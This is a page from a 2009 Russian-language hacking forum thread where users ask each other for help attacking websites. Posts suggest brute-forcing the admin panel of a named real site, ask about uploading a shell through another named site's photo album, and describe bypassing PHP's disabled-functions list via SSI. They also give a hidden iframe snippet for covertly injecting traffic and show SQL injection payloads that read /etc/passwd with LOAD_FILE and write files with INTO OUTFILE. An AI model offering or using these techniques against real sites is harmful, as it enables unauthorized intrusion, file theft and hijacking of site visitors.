ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 966 из 1393 « Первая < 466866916956 962 963 964 965 966 967 968 969 970 97610161066 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #9651  
Старый 27.10.2009, 13:23
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию
На счет твоего сайта, могу сказать что он стоин на системе Joomla 1.5,если я не ошыбаюсь.
 

  #9652  
Старый 27.10.2009, 13:37
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию
Можеш также брутом подобрать у админке
http://www.in-vest-group.ru/administrator/index.php

ПиСи
Я вообше удивляюсь где ты там увидел ксс.
 

  #9653  
Старый 27.10.2009, 14:57
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Можно ли выполнить комманду, если:
Код:
Disable Functions: escapeshellarg,escapeshellcmd,dl,shell_exec,exec,system,passthru,popen,pclose,proc_open,proc_nice,proc_close,proc_getstatus,pcntl_exec,link,symlink,apache_child_terminate,proc_terminate,posix_mkfifo,posix_getuid,posix_geteuid, posix_getgid,ssh,ssh_exec,ssh2,set_time_limit, safe_mode,posix_setpgid,posix_getpwuid, posix_getgrgid,posix_kill,ssh2_exec,pcntl_exec, ini_restore,ioctl,highlight_file, show_source,ini_alter, leak,ssthru,get_current_user, openlog,settimelimit,apache_get_modules,apache_get_version, apache_setenv,proc_get_status,posix_setsid, posix_setuid, chgrp, getmyuid, posix_access, stream_set_blocking, stream_get_transports, pfsockopen,ini_set, iniset
 

  #9654  
Старый 27.10.2009, 15:30
diehard
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
Провел на форуме:
2590715

Репутация: 659


Отправить сообщение для diehard с помощью ICQ
По умолчанию
Цитата:
Сообщение от mailbrush  
Можно ли выполнить комманду, если:
Код:
Disable Functions: escapeshellarg,escapeshellcmd,dl,shell_exec,exec,system,passthru,popen,pclose,proc_open,proc_nice,proc_close,proc_getstatus,pcntl_exec,link,symlink,apache_child_terminate,proc_terminate,posix_mkfifo,posix_getuid,posix_geteuid, posix_getgid,ssh,ssh_exec,ssh2,set_time_limit, safe_mode,posix_setpgid,posix_getpwuid, posix_getgrgid,posix_kill,ssh2_exec,pcntl_exec, ini_restore,ioctl,highlight_file, show_source,ini_alter, leak,ssthru,get_current_user, openlog,settimelimit,apache_get_modules,apache_get_version, apache_setenv,proc_get_status,posix_setsid, posix_setuid, chgrp, getmyuid, posix_access, stream_set_blocking, stream_get_transports, pfsockopen,ini_set, iniset
можно, через SSI если в apache он включен (mod_include)
Последний раз редактировалось diehard; 27.10.2009 в 17:53..
 

  #9655  
Старый 27.10.2009, 18:59
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию
Можно что-то зделать через http://forum.psihov.net.ua/store/album альбом?
Например залить шелл?
 

  #9656  
Старый 27.10.2009, 20:54
M1ks
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601

Репутация: 19
Отправить сообщение для M1ks с помощью ICQ
По умолчанию
Можно ли на сайт поставить какой ниить ифрейм, но чтобы его не было видно на сайте, прописался гденить в коде.. но траф шол... если можно, подскажите какие есть ...
 

  #9657  
Старый 27.10.2009, 21:05
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию
а что тебе мешает дать нулевые параметры фрейму?или же по одному пикселю на высоту и ширину..и будет маленьких квадратик еле заметный
 

  #9658  
Старый 27.10.2009, 21:06
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Цитата:
Сообщение от M1ks  
Можно ли на сайт поставить какой ниить ифрейм, но чтобы его не было видно на сайте, прописался гденить в коде.. но траф шол... если можно, подскажите какие есть ...
Код:
<iframe src="http://site.ru" style="display: none"></iframe>
 

  #9659  
Старый 27.10.2009, 21:10
M1ks
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме:
1091601

Репутация: 19
Отправить сообщение для M1ks с помощью ICQ
По умолчанию
благодарю..
 

  #9660  
Старый 27.10.2009, 21:43
_gr34t
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
Провел на форуме:
461696

Репутация: 40
По умолчанию
Почему в sql-injection не работают конструкции into oufile и into dumpfile?
Выполняю
Цитата:
http://site.com/calendar.php?event_id=68199+union+select+1,LOAD_FI LE('/etc/passwd'),...,67
работает!

Выполняю
Цитата:
http://site.com/calendar.php?event_id=68199+union+select+1,2,...,6 7+into+outfile+'/tmp/1'
и пытаюсь прочитать
Цитата:
http://site.com/calendar.php?event_id=68199+union+select+1,LOAD_FI LE('/tmp/1'),...,67
- не пашет.
Неужели в /tmp нельзя писать!
 
 
Страница 966 из 1393 « Первая < 466866916956 962 963 964 965 966 967 968 969 970 97610161066 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ